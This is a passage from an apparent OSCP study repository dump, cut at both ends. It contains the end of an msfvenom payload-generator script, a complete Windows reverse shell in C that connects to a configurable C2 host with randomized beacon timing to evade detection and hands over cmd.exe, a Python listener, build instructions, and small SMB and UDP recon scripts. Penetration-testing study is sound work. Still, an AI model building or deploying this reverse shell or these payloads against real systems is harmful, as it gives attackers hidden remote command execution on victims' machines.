790 | CMD="msfvenom -p ${PAYLOAD} -f ps1 \\\\\n --platform ${TYPE} -e generic/none -a x86 ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
791 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
792 |
793 | ## Python
794 | elif [[ "${TYPE}" == "python" || "${TYPE}" == "py" ]]; then
795 | [[ -z "${SHELL}" ]] \
796 | && SHELL="meterpreter"
797 | [[ -z "${STAGE}" ]] \
798 | && STAGE="staged" \
799 | && _STAGE="/"
800 | # Cant do: staged shell // stageless meterpreter // stageless bind - Invalid Payload Selected
801 | if [[ "${STAGE}" == "staged" && "${SHELL}" == "shell" ]]; then
802 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
803 | elif [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then
804 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
805 | elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then
806 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${DIRECTION} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
807 | fi
808 | TYPE="python"
809 | FILEEXT="py"
810 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
811 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
812 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
813 |
814 | ## Tomcat
815 | elif [[ "${TYPE}" == "tomcat" || "${TYPE}" == "war" ]]; then
816 | [[ -z "${SHELL}" ]] \
817 | && SHELL="meterpreter"
818 | [[ -z "${STAGE}" ]] \
819 | && STAGE="staged" \
820 | && _STAGE="/"
821 | # Cant do: stageless meterpreter // stageless bind // find_ports (Invalid Payload Selected)
822 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then
823 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
824 | elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then
825 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION} ${STAGE} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
826 | elif [[ "${METHOD}" == "find_ports" ]]; then
827 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${METHOD} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2
828 | fi
829 | TYPE="tomcat"
830 | FILEEXT="war"
831 | PAYLOAD="java/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
832 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform java -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
833 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
834 |
835 | ## Windows
836 | elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" || "${TYPE}" == "dll" || "${TYPE}" == "srv" ]]; then
837 | [[ -z "${SHELL}" ]] \
838 | && SHELL="meterpreter"
839 | [[ -z "${STAGE}" ]] \
840 | && STAGE="staged" \
841 | && _STAGE="/"
842 | [[ "${METHOD}" == "find_port" ]] \
843 | && METHOD="allports"
844 | # Its able todo anything that you throw at it =).
845 | FILEEXT="exe"
846 | [[ "${TYPE}" == "dll" ]] && FILEEXT="dll"
847 | [[ "${TYPE}" == "srv" ]] && FILEEXT="exe-service"
848 | TYPE="windows"
849 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}"
850 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT%-service}'"
851 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
852 |
853 | ## Batch/Loop modes
854 | elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then
855 | #SUCCESS=true
856 | exit 0
857 |
858 | ## Blank input
859 | elif [[ -z "${TYPE}" ]]; then
860 | echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing TYPE${RESET} or ${YELLOW}BATCH/LOOP mode${RESET}"
861 |
862 | ## Unexpected input
863 | else
864 | echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2
865 | fi
866 |
867 |
868 | #-Done--------------------------------------------------------#
869 |
870 |
871 | ##### Done!
872 | if [[ "${SUCCESS}" == true ]]; then
873 | echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python2 -m SimpleHTTPServer 8080"
874 | echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!"
875 | else
876 | doHelp
877 | fi
878 |
879 | exit 0
880 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Object files
5 | *.o
6 | *.ko
7 | *.obj
8 | *.elf
9 |
10 | # Linker output
11 | *.ilk
12 | *.map
13 | *.exp
14 |
15 | # Precompiled Headers
16 | *.gch
17 | *.pch
18 |
19 | # Libraries
20 | *.lib
21 | *.a
22 | *.la
23 | *.lo
24 |
25 | # Shared objects (inc. Windows DLLs)
26 | *.dll
27 | *.so
28 | *.so.*
29 | *.dylib
30 |
31 | # Executables
32 | *.exe
33 | *.out
34 | *.app
35 | *.i*86
36 | *.x86_64
37 | *.hex
38 |
39 | # Debug files
40 | *.dSYM/
41 | *.su
42 | *.idb
43 | *.pdb
44 |
45 | # Kernel Module Compile Results
46 | *.mod*
47 | *.cmd
48 | .tmp_versions/
49 | modules.order
50 | Module.symvers
51 | Mkfile.old
52 | dkms.conf
53 |
54 | # Build dir
55 | build/
56 |
57 | #Python guff
58 | env/
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/rev.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
113 |
114 |
115 |
223 | 1548919154018
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/README.md:
--------------------------------------------------------------------------------
1 | Original repo: https://github.com/thosearetheguise/rev
2 |
3 |
4 | This code was created by following on from https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/. I've taken some liberties and added some stuff like:
5 |
6 | Really crappy randomness for the beacon and a timeout after X beacons to stop the thing running if something goes wrong. Also, I haven't tested that because I wasn't patient enough.
7 |
8 | To compile on Kali
9 |
10 |
11 |
12 | ```bash
13 | apt install mingw-w64-i686-dev
14 | apt install mingw-w64
15 | i686-w64-mingw32-g++ rev.c -o build/rev.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -DIP=\"10.10.10.10\" -DPORT=8080
16 | ```
17 | I've moved the IP address out of the source file into the -D switch.
18 |
19 | Or use the makefile (you still need to install the require stuff from above.)
20 |
21 | ```bash
22 | make ATTK_HOST=10.10.10.10 ATTK_PORT=8080
23 | ```
24 |
25 | To compile in windows install visual studio community and hunt down cl.exe, and the .bat files to set up the env vars (google around, I can't be bothered...)
26 |
27 | For the python reciever (which as I learn stuff may become more than a random curiosity):
28 |
29 | ```bash
30 | apt-get install python3-venv
31 | python3 -m venv env
32 | source env/bin/activate
33 | ```
34 |
35 | Because I like virtual envs. If there's a requirements.txt get that running with pip -r requirements.txt.
36 |
37 | Bear in mind that at the moment recieve.py literally does nothing except what netcat would do... I just wanted to see if I could get something to work.
38 |
39 | TODO
40 | - [ ] Find a way to make the reciever handle multiple reverse shells.
41 | - [ ] Update rev.exe to support various options, with a reverse shell justing being one. This includes system enumeration, moving files to the box, sending files back, command exec, etc...
42 | - [ ] Update the functionality in rev.c so it can be compiled to time out and display a cmd.exe window (while debugging/building so it's easy to kill), and hide/never time out when using in a test or CTF.
43 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/makefile:
--------------------------------------------------------------------------------
1 | CC=i686-w64-mingw32-g++
2 | .PHONY: build
3 | BUILD_DIR=build
4 | CFLAGS=-o $(BUILD_DIR)/rev.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
5 | # You can specifigy ATTK_HOST when running make to set the attacking host at compile time.
6 | ATTK_HOST=10.10.10.10
7 | IP_Addr= -DIP=\"$(ATTK_HOST)\"
8 | ATTK_PORT=443
9 | PORT= -DPORT=$(ATTK_PORT)
10 | ATTK_LOC = $(IP_Addr) $(PORT)
11 | $(shell mkdir -p $(BUILD_DIR))
12 | build: rev.c
13 | $(CC) rev.c $(CFLAGS) $(ATTK_LOC)
14 |
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/reciever.py:
--------------------------------------------------------------------------------
1 | import socket
2 | LISTEN_IP="0.0.0.0"
3 | # Change this to whatever the target will try and connect to.
4 | LISTEN_PORT=8080
5 | BUFFER_SIZE=1024
6 |
7 | # Set this higher if you're getting jank problems with recieved data getting messed up our out of sync...
8 | tuning=0.1
9 | import time
10 |
11 | # set up out socket and start listening for those juicy requests.
12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 | s.bind((LISTEN_IP, LISTEN_PORT))
14 | s.listen(1)
15 | conn, addr = s.accept()
16 | print("Connection from"+" "+str(addr))
17 | # This reverse shell needs an inital enter to start working.
18 | conn.send(b'\n')
19 | while 1:
20 | data = ""
21 | # Give the target box a chance to send everything it's going to send.
22 | time.sleep(tuning)
23 | # Pull some stuff from the buffer.
24 | # Loop through if there's more than the buffer size in data, and stop when there's less than the buffer size (ie, we've emptied it)
25 | while 1:
26 | recv_data = conn.recv(BUFFER_SIZE)
27 | if not recv_data: break
28 | data += recv_data.decode()
29 | if len(recv_data) < BUFFER_SIZE: break
30 | if not data: break
31 | # Print out the response from the target without a newline, so we get a nice C:\> prompt.
32 | print(data, end="")
33 | # Send out data, appending a \r\n so things work properly in windows land.
34 | tosend = input()
35 | if tosend == "exit_shell": break
36 | tosend = tosend + '\r\n'
37 | conn.send(tosend.encode("utf-8"))
38 | conn.close()
--------------------------------------------------------------------------------
/Payload Generators/Rev Shell (Windows)/rev.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #pragma comment(lib, "Ws2_32.lib")
7 | #define DEFAULT_BUFLEN 1024
8 | #pragma warning( disable: 4996 )
9 |
10 | //From following https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/
11 |
12 | //From https://stackoverflow.com/questions/2509679/how-to-generate-a-random-integer-number-from-within-a-range, used to give us a random sleep time.
13 | unsigned int rand_interval(unsigned int min, unsigned int max)
14 | {
15 | int r;
16 | const unsigned int range = 1 + max - min;
17 | const unsigned int buckets = RAND_MAX / range;
18 | const unsigned int limit = buckets * range;
19 |
20 | /* Create equal size buckets all in a row, then fire randomly towards
21 | * the buckets until you land in one of them. All buckets are equally
22 | * likely. If you land off the end of the line of buckets, try again. */
23 | do
24 | {
25 | r = rand();
26 | } while (r >= limit);
27 |
28 | return min + (r / buckets);
29 | }
30 |
31 | void RunShell(char* C2Server, int C2Port) {
32 | int count = 0; //Counter used to auto-exit after a period of time.
33 | int maxTries = 10; //The number of times to try connecting and then die.
34 | while (TRUE) {
35 | //Exit if we go past our max tries. Only adding this in in case something breaks
36 | if (count >= maxTries) {
37 | exit(0);
38 | }
39 | //As pointed out in the blog, randomising this makes it harder to spot through a proxy or firewall.
40 | Sleep(rand_interval(2000, 7000));
41 |
42 | //printf("Attempting connection to C2 - ");
43 | SOCKET C2Sock;
44 | SOCKADDR_IN C2Addr;
45 | WSADATA version;
46 | WSAStartup(MAKEWORD(2, 2), &version);
47 | //Set up our local socket.
48 | C2Sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
49 | C2Addr.sin_family = AF_INET;
50 |
51 | //Set the IP and port of the C2 server.
52 | C2Addr.sin_addr.s_addr = inet_addr(C2Server);
53 | C2Addr.sin_port = htons(C2Port);
54 | //printf(C2Server);
55 | //printf(":%d \n", C2Port);
56 | //Let's try setting up our socket. If not let's wait and try later.
57 | if (WSAConnect(C2Sock, (SOCKADDR*)&C2Addr, sizeof(C2Addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
58 | //printf("Oh dear, couldn't connect %d", WSAGetLastError());
59 | closesocket(C2Sock);
60 | WSACleanup();
61 | count++;
62 | continue;
63 | }
64 | else {
65 | //Try connecting to the C2 Server
66 | char RecvData[DEFAULT_BUFLEN];
67 | memset(RecvData, 0, sizeof(RecvData));
68 | int RecvCode = recv(C2Sock, RecvData, DEFAULT_BUFLEN, 0);
69 | //We failed to connect. :(
70 | //If we can't let's wait and try later.
71 | if (RecvCode <= 0) {
72 | closesocket(C2Sock);
73 | WSACleanup();
74 | count++;
75 | continue;
76 | }
77 | else {
78 | //Set up our process.
79 | char Process[] = "cmd.exe";
80 | STARTUPINFO sinfo;
81 | PROCESS_INFORMATION pinfo; //Pinfo is used by the CreateProcess function to fill in process information. We hold the object and pass the address to the CreateProcess function so that we can get the info back.
82 | //Set the size for the sinfo struct in memory.
83 | memset(&sinfo, 0, sizeof(sinfo));
84 | //Set our startup info.
85 | sinfo.cb = sizeof(sinfo);
86 | sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
87 | //Set all input and output to go to our socket.
88 | sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)C2Sock;
89 | //Start the process
90 | CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
91 | //Wait for the process to start.
92 | WaitForSingleObject(pinfo.hProcess, INFINITE);
93 | CloseHandle(pinfo.hProcess);
94 | CloseHandle(pinfo.hThread);
95 | memset(RecvData, 0, sizeof(RecvData));
96 | int RecvCode = recv(C2Sock, RecvData, DEFAULT_BUFLEN, 0);
97 | if (RecvCode <= 0) {
98 | closesocket(C2Sock);
99 | WSACleanup();
100 | count++;
101 | continue;
102 | }
103 | if (strcmp(RecvData, "exit\n") == 0) {
104 | exit(0);
105 | }
106 | }
107 | }
108 |
109 | }
110 |
111 | }
112 |
113 | int main(int argc, char **argv) {
114 | if (argc == 3) {
115 | int port = atoi(argv[2]);
116 | RunShell(argv[1], port);
117 | }
118 | else {
119 | char host[] = IP;
120 | int port = PORT;
121 | RunShell(host, port);
122 | }
123 | return 0;
124 | }
125 |
126 |
127 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OSCP Certification
2 |
3 | ## Disclaimer
4 |
5 | The following is an unofficial list of OSCP approved tools that were posted in the [InfoSec Prep Discord Server](https://discord.gg/infosecprep) and found on the internet.
6 |
7 | Please note it is by no means a complete list of all tools. These are merely tools suggested by other users that are deemed “approved” for the exam.
8 |
9 | There will be some tools on here that were not suggested on the Discord server as well.
10 |
11 | As a general rule of thumb, if a tool can auto-exploit, it is banned on the exam.
12 |
13 | The list is subject to additions/removals as time goes by.
14 |
15 | ## About Repo
16 |
17 | The primary purpose of this repository is to contain resources that will be useful for the PEN-200 course and subsequently the OSCP Certification.
18 |
19 | I have an [unofficial OSCP Approved tools list](https://falconspy.medium.com/unofficial-oscp-approved-tools-b2b4e889e707) that's been on Medium that I more or less stopped updating. That list will be transferred to this repository where it will be maintained hopefully by myself and others.
20 |
21 | Please find the resource you are looking for in its respective folder above. There you can find more information about what tools are available and if any of them have downloads like templates, you can find the download there as well.
--------------------------------------------------------------------------------
/Reconnaissance/Port-Service Scans/README.md:
--------------------------------------------------------------------------------
1 | # udp_scan.pl
2 | This is a Perl script I created that utilizes netcat to scan the top 20 most used UDP ports.
3 |
4 | Usage: perl script.pl 10.10.10.10 udp_scan.txt; cat udp_scan.txt | grep -v "?"
5 |
6 | Anything that appears in the results is most likely open.
--------------------------------------------------------------------------------
/Reconnaissance/Port-Service Scans/smbver.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #Author: rewardone
3 | #Description:
4 | # Requires root or enough permissions to use tcpdump
5 | # Will listen for the first 8 packets of a null login
6 | # and grab the SMB Version
7 | #Notes:
8 | # Will sometimes not capture or will print multiple
9 | # lines. May need to run a second time for success.
10 | if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
11 | if [ ! -z $2 ]; then rport=$2; else rport=139; fi
12 | tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
13 | echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
14 | echo "" && sleep .1
15 |
--------------------------------------------------------------------------------
/Reconnaissance/Port-Service Scans/udp_scan.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | use strict;
3 | use warnings;
4 |
5 | my @topPorts = (52, 67, 68, 69, 123, 135, 137, 138, 139, 161, 162, 445, 500, 514,520,631,1434,1900,4500,49152);
6 |
7 | my $nc = "/bin/nc";
8 | my $outFile;
9 | my $target;
10 |
11 | if(@ARGV < 2) {
12 | print("Usage: $0